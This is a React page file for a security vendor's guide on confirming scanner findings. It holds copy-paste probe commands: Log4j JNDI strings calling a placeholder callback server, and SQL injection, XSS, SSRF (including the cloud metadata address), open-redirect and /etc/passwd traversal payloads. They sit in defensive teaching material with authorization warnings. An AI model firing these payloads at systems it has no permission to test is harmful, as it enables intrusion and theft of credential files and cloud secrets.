// src/pages/guides/VulnerabilityValidationGuide.js
// Vulnerability Validation Guide - SEO Playbook Page

import React, { useState } from 'react';
import useTrialCta from '../../hooks/useTrialCta';
import GuideByline from './GuideByline';
import GuideAnswer from './GuideAnswer';
import GuideFAQ, { buildFAQPageSchema } from './GuideFAQ';
import { Link } from 'react-router-dom';
import SEOHead from '../../components/common/SEOHead';
import { PublicHeader, PublicFooter } from '../../components/common';
import './Guides.css';

function VulnerabilityValidationGuide() {
  const startTrial = useTrialCta('guide_trial:vulnerability-validation');
  const [copiedBlock, setCopiedBlock] = useState(null);

  const copyToClipboard = (text, blockId) => {
    navigator.clipboard.writeText(text).then(() => {
      setCopiedBlock(blockId);
      setTimeout(() => setCopiedBlock(null), 2000);
    });
  };

  const CodeBlock = ({ id, title, code }) => (
    <div className="code-block">
      <button
        className={`code-block-copy ${copiedBlock === id ? 'copied' : ''}`}
        onClick={() => copyToClipboard(code, id)}
      >
        {copiedBlock === id ? 'Copied!' : 'Copy'}
      </button>
      {title && (
        <div className="code-block-header">
          <span className="code-block-title">{title}</span>
        </div>
      )}
      <pre>{code}</pre>
    </div>
  );

  const articleSchema = {
    "@context": "https://schema.org",
    "@type": "Article",
    "headline": "Vulnerability Validation Guide",
    "description": "Learn to validate security vulnerabilities with practical verification techniques. Verify Log4j, Spring4Shell, exposed services, and web app vulns before escalating.",
    "image": ["https://www.driftalarm.com/images/og-image.png"],
    "datePublished": "2025-12-01T00:00:00-05:00",
    "dateModified": "2026-08-25T00:00:00-04:00",
    "author": { "@type": "Organization", "name": "DriftAlarm", "url": "https://www.driftalarm.com" },
    "publisher": { "@type": "Organization", "name": "DriftAlarm", "url": "https://www.driftalarm.com", "logo": { "@type": "ImageObject", "url": "https://www.driftalarm.com/images/og-image.png" } },
    "url": "https://www.driftalarm.com/guides/vulnerability-validation",
    "mainEntityOfPage": "https://www.driftalarm.com/guides/vulnerability-validation"
  };

  const breadcrumbSchema = {
    "@context": "https://schema.org",
    "@type": "BreadcrumbList",
    "itemListElement": [
      { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://www.driftalarm.com" },
      { "@type": "ListItem", "position": 2, "name": "Security Guides", "item": "https://www.driftalarm.com/guides" },
      { "@type": "ListItem", "position": 3, "name": "Vulnerability Validation" }
    ]
  };

  return (
    <div className="guide-container">
      <SEOHead
        title="Vulnerability Validation Guide | DriftAlarm"
        description="Learn to validate security vulnerabilities with copy-paste curl commands. Verify Log4j, Spring4Shell, exposed services, and web app vulns before escalating. See how DriftAlarm automates validation."
        path="/guides/vulnerability-validation"
        ogType="article"
        jsonLd={[articleSchema, breadcrumbSchema, buildFAQPageSchema('/guides/vulnerability-validation')].filter(Boolean)}
      />
      <PublicHeader activeLink="guides" />

      <main className="guide-content">
        <section className="guide-hero">
          <h1>How to Validate Vulnerabilities: From Alert to Confirmed Finding</h1>
          <GuideByline path="/guides/vulnerability-validation" />
          <GuideAnswer path="/guides/vulnerability-validation" />
          <p className="guide-hero-intro">
            Not every scanner alert is a real vulnerability. Before you escalate, patch, or panic—validate.
            This guide gives you copy-paste commands to verify common vulnerabilities and exposures,
            plus shows how DriftAlarm automates this process.
          </p>

          <div className="guide-hero-bullets">
            <div className="guide-hero-bullets-title">What You'll Learn</div>
            <ul>
              <li>Why validation matters (false positives, prioritization)</li>
              <li>Manual validation techniques with curl, wget, nmap</li>
              <li>Validating common CVEs (Log4j, Spring4Shell, etc.)</li>
              <li>Verifying exposed services (RDP, SSH, admin panels)</li>
              <li>Web application vulnerability testing basics</li>
              <li>How DriftAlarm automates vulnerability validation</li>
            </ul>
          </div>

          <div className="guide-cta-group">
            <button className="da-btn da-btn--primary" onClick={startTrial}>
              <span>Start Free 30-Day Trial</span>
              <span>→</span>
            </button>
            <Link to="/guides/attack-surface-monitoring" className="da-btn da-btn--secondary">
              Back to Attack Surface Monitoring Guide
            </Link>
          </div>
        </section>

        <nav className="guide-toc">
          <div className="guide-toc-title">In This Guide</div>
          <ul className="guide-toc-list">
            <li><a href="#why-validate">Why Validation Matters</a></li>
            <li><a href="#validation-basics">Validation Fundamentals</a></li>
            <li><a href="#cve-validation">Validating Common CVEs</a></li>
            <li><a href="#exposure-validation">Verifying Exposed Services</a></li>
            <li><a href="#webapp-validation">Web Application Testing</a></li>
            <li><a href="#r3dteam-validation">How DriftAlarm Validates</a></li>
            <li><a href="#safe-testing">Safe Testing Practices</a></li>
            <li><a href="#faq">Frequently Asked Questions</a></li>
          </ul>
        </nav>

        <section id="why-validate" className="guide-section">
          <h2>Why Validation Matters</h2>

          <p>
            Vulnerability scanners are essential tools, but they're not perfect. They report
            what <em>might</em> be vulnerable based on version detection, signatures, and heuristics.
            Validation confirms whether a vulnerability actually exists and is exploitable in your environment.
          </p>

          <div className="callout callout-critical">
            <div className="callout-title">The Validation Principle</div>
            <div className="callout-content">
              <p>
                <strong>An unvalidated P1 is really a P2 until you prove it's exploitable.</strong> Conversely,
                a validated finding—even if lower severity—demands immediate attention because you know it's real.
              </p>
            </div>
          </div>

          <h3>The Cost of Not Validating</h3>
          <ul>
            <li><strong>Chasing false positives:</strong> Teams waste hours patching or mitigating
                vulnerabilities that don't actually affect them</li>
            <li><strong>Alert fatigue:</strong> When everything is a P1, nothing is a P1. Teams start
                ignoring alerts</li>
            <li><strong>Misallocated resources:</strong> Critical vulnerabilities get delayed while teams
                chase phantom issues</li>
            <li><strong>Loss of credibility:</strong> Reporting unvalidated findings erodes trust with
                stakeholders</li>
          </ul>

          <h3>The Value of Validation</h3>
          <ul>
            <li><strong>Confidence:</strong> Validated findings can be escalated with certainty</li>
            <li><strong>Prioritization:</strong> Focus remediation on confirmed, exploitable issues</li>
            <li><strong>Evidence:</strong> Validation produces proof for compliance and audit requirements</li>
            <li><strong>Communication:</strong> "I confirmed this is exploitable" carries more weight than
                "the scanner says so"</li>
          </ul>

          <div className="callout callout-info">
            <div className="callout-title">DriftAlarm Approach</div>
            <div className="callout-content">
              <p>
                DriftAlarm validates findings before alerting you. Our platform uses multi-engine correlation
                and out-of-band verification to confirm vulnerabilities are real, reducing false positive
                noise and ensuring you only see findings that matter.
              </p>
            </div>
          </div>
        </section>

        <section id="validation-basics" className="guide-section">
          <h2>Validation Fundamentals</h2>

          <p>
            Before diving into specific vulnerabilities, let's establish the tools and techniques
            you'll use for validation.
          </p>

          <h3>Tools You'll Need</h3>
          <ul>
            <li><strong>curl:</strong> HTTP client for testing web vulnerabilities</li>
            <li><strong>nmap:</strong> Port scanner with vulnerability detection scripts</li>
            <li><strong>nc (netcat):</strong> Basic connectivity testing</li>
            <li><strong>Browser DevTools:</strong> Inspecting responses and network traffic</li>
            <li><strong>Callback server:</strong> For out-of-band detection (Burp Collaborator, interactsh, etc.)</li>
          </ul>

          <h3>Basic Connectivity Checks</h3>
          <p>Before testing for vulnerabilities, confirm the target is reachable:</p>

          <CodeBlock
            id="connectivity"
            title="Basic Connectivity"
            code={`# Check if a port is open and responding
curl -v --connect-timeout 5 https://target.com:443

# Check HTTP response headers
curl -I https://target.com

# Check if a TCP port accepts connections
nc -zv target.com 22
nc -zv target.com 3389

# Check service version with nmap
nmap -sV -p 443 target.com`}
          />

          <h3>Confidence Levels</h3>
          <p>Assign confidence to your validation results:</p>

          <div className="guide-table-wrapper">
            <table className="guide-table">
              <thead>
                <tr>
                  <th>Confidence</th>
                  <th>Evidence</th>
                  <th>Action</th>
                </tr>
              </thead>
              <tbody>
                <tr>
                  <td><span className="priority-badge p0">High</span></td>
                  <td>Direct exploitation confirmed (callback received, data returned)</td>
                  <td>Escalate immediately</td>
                </tr>
                <tr>
                  <td><span className="priority-badge p2">Medium</span></td>
                  <td>Vulnerable version confirmed, but exploitation not tested</td>
                  <td>Escalate with caveat</td>
                </tr>
                <tr>
                  <td><span className="priority-badge p4">Low</span></td>
                  <td>Scanner signature match only, no version or behavior confirmation</td>
                  <td>Investigate further before escalating</td>
                </tr>
              </tbody>
            </table>
          </div>

          <div className="callout callout-warning">
            <div className="callout-title">Authorization Required</div>
            <div className="callout-content">
              <p>
                <strong>Only test systems you own or have written authorization to test.</strong>
                Unauthorized testing is illegal in most jurisdictions. When in doubt, get explicit
                permission before validating.
              </p>
            </div>
          </div>
        </section>

        <section id="cve-validation" className="guide-section">
          <h2>Validating Common CVEs</h2>

          <p>
            Here are validation techniques for frequently encountered critical CVEs.
            These commands are designed to confirm vulnerability without causing damage.
          </p>

          <h3>Log4j (CVE-2021-44228)</h3>
          <p>
            Log4Shell is a critical remote code execution vulnerability in Apache Log4j 2.x.
            It allows attackers to execute arbitrary code by injecting JNDI lookup strings into
            logged data.
          </p>

          <CodeBlock
            id="log4j"
            title="Log4j Validation"
            code={`# Safe detection using DNS callback
# Replace YOUR-CALLBACK-SERVER with your Burp Collaborator/interactsh domain

# Test via User-Agent header
curl -H 'User-Agent: \${jndi:ldap://YOUR-CALLBACK-SERVER/log4j-ua}' https://target.com

# Test via X-Api-Version header
curl -H 'X-Api-Version: \${jndi:ldap://YOUR-CALLBACK-SERVER/log4j-api}' https://target.com

# Test via query parameter
curl 'https://target.com/api?search=\${jndi:ldap://YOUR-CALLBACK-SERVER/log4j-param}'

# Test via POST body
curl -X POST https://target.com/api \\
  -H 'Content-Type: application/json' \\
  -d '{"name":"\${jndi:ldap://YOUR-CALLBACK-SERVER/log4j-body}"}'`}
          />

          <p><strong>What to look for:</strong> DNS or LDAP callback to your server indicates vulnerability.
            The application is parsing and executing the JNDI lookup.</p>

          <div className="callout callout-info">
            <div className="callout-title">DriftAlarm Log4j Validation</div>
            <div className="callout-content">
              <p>
                DriftAlarm uses out-of-band detection with our callback infrastructure to safely
                validate Log4j across all common injection points. We test headers, parameters,
                and body data without exploitation.
              </p>
            </div>
          </div>

          <h3>Spring4Shell (CVE-2022-22965)</h3>
          <p>
            Spring4Shell affects Spring Framework applications running on JDK 9+ with
            specific configurations. It allows remote code execution through class loader manipulation.
          </p>

          <CodeBlock
            id="spring4shell"
            title="Spring4Shell Validation"
            code={`# Check for vulnerable endpoint pattern
# A non-error response or behavior change indicates potential vulnerability

curl -X POST 'https://target.com/path' \\
  -H 'Content-Type: application/x-www-form-urlencoded' \\
  -d 'class.module.classLoader.URLs[0]=test'

# Check for Spring error page (indicates Spring Framework)
curl -I 'https://target.com/nonexistent-page-12345'

# Version detection via actuator (if exposed)
curl 'https://target.com/actuator/info'
curl 'https://target.com/actuator/env'`}
          />

          <p><strong>What to look for:</strong> Non-error response to the classLoader test, or
            Spring-specific error pages that reveal framework usage.</p>

          <h3>Heartbleed (CVE-2014-0160)</h3>
          <p>
            Heartbleed is an OpenSSL vulnerability that allows attackers to read memory from
            affected servers, potentially exposing private keys and sensitive data.
          </p>

          <CodeBlock
            id="heartbleed"
            title="Heartbleed Validation"
            code={`# Using nmap's ssl-heartbleed script
nmap -p 443 --script ssl-heartbleed target.com

# Check OpenSSL version (if accessible)
openssl s_client -connect target.com:443 2>/dev/null | grep -i 'SSL-Session\\|Protocol\\|Cipher'

# Alternative with testssl.sh
./testssl.sh --heartbleed target.com:443`}
          />

          <p><strong>What to look for:</strong> Nmap output stating "VULNERABLE" for ssl-heartbleed script.</p>

          <h3>ProxyLogon / ProxyShell (Exchange)</h3>
          <p>
            These Exchange Server vulnerabilities allow pre-authentication remote code execution.
            Validation focuses on version detection and endpoint accessibility.
          </p>

          <CodeBlock
            id="exchange"
            title="Exchange Vulnerability Validation"
            code={`# Check Exchange version via OWA
curl -I 'https://target.com/owa/auth/logon.aspx' | grep -i 'x-owa-version'

# Check for exposed MAPI endpoint (ProxyShell indicator)
curl -I 'https://target.com/mapi/nspi/'

# Check for Autodiscover endpoint
curl -I 'https://target.com/autodiscover/autodiscover.xml'

# Check ECP accessibility
curl -I 'https://target.com/ecp/'`}
          />

          <p><strong>What to look for:</strong> Version headers revealing unpatched Exchange (pre-April 2021
            for ProxyLogon, pre-July 2021 for ProxyShell).</p>

          <h3>Apache Struts (CVE-2017-5638)</h3>
          <p>
            Struts vulnerability allows remote code execution via crafted Content-Type headers.
          </p>

          <CodeBlock
            id="struts"
            title="Apache Struts Validation"
            code={`# Check for Struts-specific error behavior
curl -I -H 'Content-Type: %{invalid}' 'https://target.com/struts/action'

# Look for .action or .do endpoints (Struts indicators)
curl -I 'https://target.com/login.action'
curl -I 'https://target.com/submit.do'

# Check for Struts error messages in response
curl 'https://target.com/' | grep -i 'struts\\|ognl'`}
          />

          <div className="example-box">
            <div className="example-title">CVE Validation Checklist</div>
            <div className="example-content">
              <ol>
                <li>Confirm target is in scope and you have authorization</li>
                <li>Identify the CVE and affected component</li>
                <li>Check version (if detectable) against known vulnerable versions</li>
                <li>Use safe detection payload (DNS callback, version check)</li>
                <li>Document evidence (screenshots, callback logs, response data)</li>
                <li>Assign confidence level and escalate appropriately</li>
              </ol>
            </div>
          </div>
        </section>

        <section id="exposure-validation" className="guide-section">
          <h2>Verifying Exposed Services</h2>

          <p>
            Beyond CVEs, validating exposed services confirms that management interfaces and
            protocols are actually reachable from the internet.
          </p>

          <h3>Exposed RDP (Port 3389)</h3>
          <CodeBlock
            id="rdp"
            title="RDP Exposure Validation"
            code={`# Check if RDP responds
nc -zv target.com 3389

# Get RDP service information
nmap -p 3389 --script rdp-ntlm-info target.com

# Check NLA status
nmap -p 3389 --script rdp-enum-encryption target.com`}
          />
          <p>
            <strong>See also:</strong> <Link to="/guides/exposed-rdp">Exposed RDP Response Guide</Link> for
            complete containment and remediation steps.
          </p>

          <h3>Exposed SSH (Port 22)</h3>
          <CodeBlock
            id="ssh"
            title="SSH Exposure Validation"
            code={`# Check SSH version and key exchange
ssh -v -o ConnectTimeout=5 -o StrictHostKeyChecking=no target.com 2>&1 | head -30

# Nmap version and algorithm detection
nmap -p 22 -sV --script ssh2-enum-algos target.com

# Check supported authentication methods
nmap -p 22 --script ssh-auth-methods target.com`}
          />
          <p>
            <strong>See also:</strong> <Link to="/guides/exposed-ssh">Exposed SSH Response Guide</Link> for
            hardening recommendations.
          </p>

          <h3>Exposed Admin Panels</h3>
          <CodeBlock
            id="admin-panels"
            title="Admin Panel Validation"
            code={`# Check common admin paths
curl -I https://target.com/admin
curl -I https://target.com/wp-admin
curl -I https://target.com/administrator
curl -I https://target.com/phpmyadmin
curl -I https://target.com/cpanel
curl -I https://target.com/jenkins
curl -I https://target.com/manager/html

# Check response codes:
# 200 = accessible
# 403 = exists but blocked
# 401 = requires auth (still exposed!)
# 404 = not found`}
          />
          <p>
            <strong>See also:</strong> <Link to="/guides/exposed-admin-panels">Exposed Admin Panels Guide</Link> for
            prioritization and remediation.
          </p>

          <h3>Exposed Cloud Storage</h3>
          <CodeBlock
            id="cloud-storage"
            title="Cloud Storage Validation"
            code={`# AWS S3 - check if bucket is public
curl -I https://bucketname.s3.amazonaws.com
curl https://bucketname.s3.amazonaws.com?list-type=2

# Azure Blob Storage
curl -I https://accountname.blob.core.windows.net/containername
curl 'https://accountname.blob.core.windows.net/containername?restype=container&comp=list'

# Google Cloud Storage
curl -I https://storage.googleapis.com/bucketname
curl https://storage.googleapis.com/bucketname`}
          />
          <p>
            <strong>See also:</strong> <Link to="/guides/cloud-storage-exposure">Cloud Storage Exposure Guide</Link> for
            immediate response steps.
          </p>

          <h3>Exposed Databases</h3>
          <CodeBlock
            id="databases"
            title="Database Exposure Validation"
            code={`# MySQL (3306)
nc -zv target.com 3306

# PostgreSQL (5432)
nc -zv target.com 5432

# MongoDB (27017)
nc -zv target.com 27017

# Redis (6379)
nc -zv target.com 6379
# If connected, try: INFO (unauthenticated access)

# Elasticsearch (9200)
curl http://target.com:9200
curl http://target.com:9200/_cat/indices`}
          />

          <div className="callout callout-warning">
            <div className="callout-title">Database Exposure = Immediate P1</div>
            <div className="callout-content">
              <p>
                Any database port responding from the internet is a critical finding. Databases
                contain sensitive data and are frequently targeted for ransomware, data theft,
                and cryptojacking.
              </p>
            </div>
          </div>
        </section>

        <section id="webapp-validation" className="guide-section">
          <h2>Web Application Testing Basics</h2>

          <div className="callout callout-warning">
            <div className="callout-title">Careful with Web App Testing</div>
            <div className="callout-content">
              <p>
                Web application testing can modify data or cause unintended effects. <strong>Only test
                with explicit authorization</strong> and consider using a staging environment when possible.
              </p>
            </div>
          </div>

          <h3>Reflected XSS Detection</h3>
          <CodeBlock
            id="xss"
            title="XSS Validation"
            code={`# Test for reflection (look for unescaped output)
curl 'https://target.com/search?q=<script>alert(1)</script>'

# Alternative payloads for filtering bypass
curl 'https://target.com/search?q=<img src=x onerror=alert(1)>'
curl 'https://target.com/search?q="><script>alert(1)</script>'

# Check the response for unescaped output
curl 'https://target.com/search?q=TESTINPUT12345' | grep 'TESTINPUT12345'`}
          />
          <p><strong>What to look for:</strong> Your input reflected in the response without HTML encoding
            (e.g., &lt; not converted to &amp;lt;).</p>

          <h3>SQL Injection Detection</h3>
          <CodeBlock
            id="sqli"
            title="SQL Injection Validation"
            code={`# Error-based detection (look for SQL error messages)
curl "https://target.com/product?id=1'"
curl "https://target.com/product?id=1%27"

# Boolean-based detection (compare responses)
curl "https://target.com/product?id=1 AND 1=1"
curl "https://target.com/product?id=1 AND 1=2"

# Time-based detection (response delay indicates vuln)
curl "https://target.com/product?id=1; WAITFOR DELAY '0:0:5'--"
curl "https://target.com/product?id=1' AND SLEEP(5)--"`}
          />
          <p><strong>What to look for:</strong> SQL error messages (syntax error, unterminated string),
            different responses for true/false conditions, or delayed responses.</p>

          <h3>Open Redirect</h3>
          <CodeBlock
            id="redirect"
            title="Open Redirect Validation"
            code={`# Check redirect behavior (examine Location header)
curl -I 'https://target.com/redirect?url=https://evil.com'
curl -I 'https://target.com/login?next=https://evil.com'
curl -I 'https://target.com/goto?link=//evil.com'

# Common parameter names to test
# url, redirect, next, return, returnUrl, goto, link, target, dest`}
          />
          <p><strong>What to look for:</strong> Location header pointing to an external domain you control.</p>

          <h3>Server-Side Request Forgery (SSRF)</h3>
          <CodeBlock
            id="ssrf"
            title="SSRF Validation"
            code={`# Test with callback server
curl 'https://target.com/fetch?url=http://YOUR-CALLBACK-SERVER/ssrf-test'

# Test for internal access
curl 'https://target.com/fetch?url=http://127.0.0.1'
curl 'https://target.com/fetch?url=http://localhost'
curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/'

# Common SSRF parameter names
# url, uri, path, src, dest, redirect, file, feed, proxy`}
          />
          <p><strong>What to look for:</strong> Callback received, or internal data returned
            (especially AWS metadata).</p>

          <h3>Directory Traversal</h3>
          <CodeBlock
            id="traversal"
            title="Directory Traversal Validation"
            code={`# Test path traversal
curl 'https://target.com/file?name=../../../etc/passwd'
curl 'https://target.com/download?path=....//....//etc/passwd'
curl 'https://target.com/view?doc=..\\..\\..\\windows\\win.ini'

# URL-encoded variants
curl 'https://target.com/file?name=%2e%2e%2f%2e%2e%2fetc/passwd'`}
          />
          <p><strong>What to look for:</strong> Contents of system files in the response
            (passwd entries, win.ini contents).</p>

          <div className="guide-table-wrapper">
            <table className="guide-table">
              <thead>
                <tr>
                  <th>Vulnerability</th>
                  <th>Validation Signal</th>
                  <th>Confidence</th>
                </tr>
              </thead>
              <tbody>
                <tr>
                  <td>XSS</td>
                  <td>Unescaped input in response</td>
                  <td><span className="priority-badge p0">High</span></td>
                </tr>
                <tr>
                  <td>SQL Injection</td>
                  <td>SQL error or boolean difference</td>
                  <td><span className="priority-badge p0">High</span></td>
                </tr>
                <tr>
                  <td>Open Redirect</td>
                  <td>External redirect in Location header</td>
                  <td><span className="priority-badge p0">High</span></td>
                </tr>
                <tr>
                  <td>SSRF</td>
                  <td>Callback received or internal data returned</td>
                  <td><span className="priority-badge p0">High</span></td>
                </tr>
                <tr>
                  <td>Path Traversal</td>
                  <td>System file contents in response</td>
                  <td><span className="priority-badge p0">High</span></td>
                </tr>
              </tbody>
            </table>
          </div>
        </section>

        <section id="r3dteam-validation" className="guide-section">
          <h2>How DriftAlarm Validates</h2>

          <div className="callout callout-info">
            <div className="callout-title">Automated Validation</div>
            <div className="callout-content">
              <p>
                DriftAlarm automates the validation process described in this guide. Our platform
                performs safe, non-destructive validation to confirm findings before alerting you.
              </p>
            </div>
          </div>

          <h3>Multi-Engine Scanning</h3>
          <p>
            We correlate findings across multiple detection engines. A vulnerability flagged by
            multiple sources has higher confidence than a single-source detection.
          </p>
          <ul>
            <li>Nuclei templates for CVE detection</li>
            <li>Custom validation scripts for common exposures</li>
            <li>Version fingerprinting and correlation</li>
            <li>Configuration weakness detection</li>
          </ul>

          <h3>Out-of-Band Verification</h3>
          <p>
            For blind vulnerabilities like Log4j and SSRF, we use out-of-band callback
            infrastructure:
          </p>
          <ul>
            <li>DNS callbacks for JNDI injection</li>
            <li>HTTP callbacks for SSRF and blind XSS</li>
            <li>Unique identifiers per test for accurate attribution</li>
            <li>No exploitation—only detection confirmation</li>
          </ul>

          <h3>Confidence Scoring</h3>
          <p>
            Every finding includes a confidence score based on validation results:
          </p>
          <ul>
            <li><strong>High confidence:</strong> Callback received, exploit confirmed, or data extracted</li>
            <li><strong>Medium confidence:</strong> Vulnerable version confirmed, behavior indicates vuln</li>
            <li><strong>Low confidence:</strong> Signature match only, needs manual verification</li>
          </ul>

          <h3>What DriftAlarm Validates Automatically</h3>
          <div className="example-box">
            <div className="example-title">Automated Validation Coverage</div>
            <div className="example-content">
              <ul>
                <li>Log4j across common injection points (headers, params, body)</li>
                <li>Exposed management ports (RDP, SSH, VNC, Telnet)</li>
                <li>Public cloud storage (S3, Azure Blob, GCS)</li>
                <li>Known CVEs via Nuclei templates</li>
                <li>SSL/TLS misconfigurations (expired certs, weak ciphers)</li>
                <li>Default credentials on common services</li>
                <li>Exposed admin panels and management interfaces</li>
                <li>DNS misconfigurations (zone transfers, dangling records)</li>
              </ul>
            </div>
          </div>

          <div className="guide-cta-group" style={{ marginTop: '30px' }}>
            <button className="da-btn da-btn--primary" onClick={startTrial}>
              <span>Start Free 30-Day Trial</span>
              <span>→</span>
            </button>
          </div>
        </section>

        <section id="safe-testing" className="guide-section">
          <h2>Safe Testing Practices</h2>

          <p>
            Validation should confirm vulnerabilities exist without causing harm. Follow these
            principles for safe, ethical testing.
          </p>

          <h3>Authorization First</h3>
          <ul>
            <li><strong>Written permission:</strong> Always have documented authorization before testing</li>
            <li><strong>Scope definition:</strong> Know exactly which systems you're allowed to test</li>
            <li><strong>Rules of engagement:</strong> Understand what testing is permitted</li>
            <li><strong>Emergency contacts:</strong> Know who to call if something goes wrong</li>
          </ul>

          <h3>Non-Destructive Payloads</h3>
          <ul>
            <li><strong>Read, don't write:</strong> Use payloads that confirm vuln without modifying data</li>
            <li><strong>Callbacks over exploitation:</strong> DNS/HTTP callbacks prove vuln without RCE</li>
            <li><strong>Minimum impact:</strong> Test once, don't flood with requests</li>
            <li><strong>No data exfiltration:</strong> Confirm access exists without extracting real data</li>
          </ul>

          <div className="callout callout-critical">
            <div className="callout-title">Validation Is NOT Exploitation</div>
            <div className="callout-content">
              <p>
                <strong>Stop at confirmation.</strong> Once you've proven a vulnerability exists,
                document it and escalate. Don't attempt full exploitation, data access, or
                lateral movement—that's beyond validation scope.
              </p>
            </div>
          </div>

          <h3>Documentation Requirements</h3>
          <ul>
            <li><strong>Timestamp everything:</strong> When you tested, what you tested</li>
            <li><strong>Capture evidence:</strong> Screenshots, response data, callback logs</li>
            <li><strong>Note methodology:</strong> Exactly what commands/tools you used</li>
            <li><strong>Record outcomes:</strong> Confirmed/not confirmed/inconclusive</li>
          </ul>

          <h3>When to Stop</h3>
          <ul>
            <li>Vulnerability is confirmed—no need to test further</li>
            <li>You encounter unexpected behavior (data corruption, service disruption)</li>
            <li>You reach scope boundaries</li>
            <li>You're unsure if continued testing is authorized</li>
          </ul>

          <div className="guide-table-wrapper">
            <table className="guide-table">
              <thead>
                <tr>
                  <th>Safe Approach</th>
                  <th>Dangerous Approach</th>
                </tr>
              </thead>
              <tbody>
                <tr>
                  <td>DNS callback to confirm Log4j</td>
                  <td>Deploying reverse shell via Log4j</td>
                </tr>
                <tr>
                  <td>Reading /etc/passwd via traversal</td>
                  <td>Modifying config files via traversal</td>
                </tr>
                <tr>
                  <td>Boolean-based SQLi detection</td>
                  <td>Dumping database contents</td>
                </tr>
                <tr>
                  <td>Confirming S3 bucket is listable</td>
                  <td>Downloading all bucket contents</td>
                </tr>
                <tr>
                  <td>Version check on exposed RDP</td>
                  <td>Attempting credential brute force</td>
                </tr>
              </tbody>
            </table>
          </div>
        </section>

        {/* PRD-193 WP4: this guide previously had NO link to /upgrade or
            /how-it-works -- its only exit was a trial button that went to the sign-IN
            form. Mid-article conversion path, matching the block the other guides use. */}
        <section className="guide-section">
          <div className="guide-cta-section">
            <h3>Put This Into Practice</h3>
            <p>Validation is the slow part of this work, and it is the part that decides whether a finding deserves your afternoon. DriftAlarm runs the evidence-gathering step described above on every scan, so what reaches your queue arrives with the proof attached.</p>
            <div className="guide-cta-buttons">
              <button onClick={startTrial} className="da-btn da-btn--primary">Start Free 30-Day Trial</button>
              <Link to="/how-it-works" className="da-btn da-btn--secondary">See How It Works</Link>
            </div>
          </div>
        </section>

        <section className="guide-section">
          <h2>Related Security Guides</h2>
          <p>
            Continue building your security validation and response capabilities:
          </p>
          <ul>
            <li>
              <Link to="/guides/attack-surface-monitoring">Attack Surface Monitoring Guide</Link> — Learn the fundamentals of continuous attack surface monitoring and exposure prioritization.
            </li>
            <li>
              <Link to="/guides/easm-vs-vulnerability-scanning">EASM vs Vulnerability Scanning</Link> — Understand when you need EASM, vulnerability scanning, or both.
            </li>
            <li>
              <Link to="/guides/manual-recon-vs-easm">Manual Recon vs Managed EASM</Link> — Compare the real costs of manual reconnaissance with automated EASM.
            </li>
            <li>
              <Link to="/guides/exposed-rdp">Exposed RDP Guide</Link> — Detailed response playbook when you discover exposed Remote Desktop Protocol.
            </li>
            <li>
              <Link to="/guides/exposed-ssh">Exposed SSH Guide</Link> — How to respond to and harden exposed SSH services.
            </li>
            <li>
              <Link to="/guides/exposed-admin-panels">Exposed Admin Panels Guide</Link> — Prioritization and remediation for exposed web management interfaces.
            </li>
            <li>
              <Link to="/guides/cloud-storage-exposure">Cloud Storage Exposure Guide</Link> — Immediate response for public S3 buckets and Azure Blob storage.
            </li>
            <li>
              <Link to="/guides/eol-software">EOL Software Guide</Link> — Handling end-of-life software with known vulnerabilities.
            </li>
          </ul>
        </section>

        <section className="guide-section">
          <h2>Summary: Validation Checklist</h2>
          <div className="quickstart-list">
            <div className="quickstart-day">
              <div className="quickstart-day-header">
                <span className="quickstart-day-label">Step 1</span>
                <span className="quickstart-day-title">Confirm Authorization</span>
              </div>
              <ul className="quickstart-day-tasks">
                <li>Verify target is in scope</li>
                <li>Have written permission documented</li>
                <li>Know the rules of engagement</li>
              </ul>
            </div>

            <div className="quickstart-day">
              <div className="quickstart-day-header">
                <span className="quickstart-day-label">Step 2</span>
                <span className="quickstart-day-title">Select Validation Method</span>
              </div>
              <ul className="quickstart-day-tasks">
                <li>Identify the vulnerability type</li>
                <li>Choose appropriate safe payload</li>
                <li>Set up callback server if needed</li>
              </ul>
            </div>

            <div className="quickstart-day">
              <div className="quickstart-day-header">
                <span className="quickstart-day-label">Step 3</span>
                <span className="quickstart-day-title">Execute Validation</span>
              </div>
              <ul className="quickstart-day-tasks">
                <li>Run validation command</li>
                <li>Capture evidence (screenshots, responses)</li>
                <li>Note timestamps and methodology</li>
              </ul>
            </div>

            <div className="quickstart-day">
              <div className="quickstart-day-header">
                <span className="quickstart-day-label">Step 4</span>
                <span className="quickstart-day-title">Document & Escalate</span>
              </div>
              <ul className="quickstart-day-tasks">
                <li>Assign confidence level (High/Medium/Low)</li>
                <li>Document evidence and methodology</li>
                <li>Escalate validated findings appropriately</li>
              </ul>
            </div>
          </div>

          <div className="guide-cta-group" style={{ marginTop: '40px' }}>
            <button className="da-btn da-btn--primary" onClick={startTrial}>
              <span>Start Free 30-Day Trial</span>
              <span>→</span>
            </button>
          </div>
        </section>
        <GuideFAQ path="/guides/vulnerability-validation" />
      </main>

      <PublicFooter />
    </div>
  );
}

export default VulnerabilityValidationGuide;
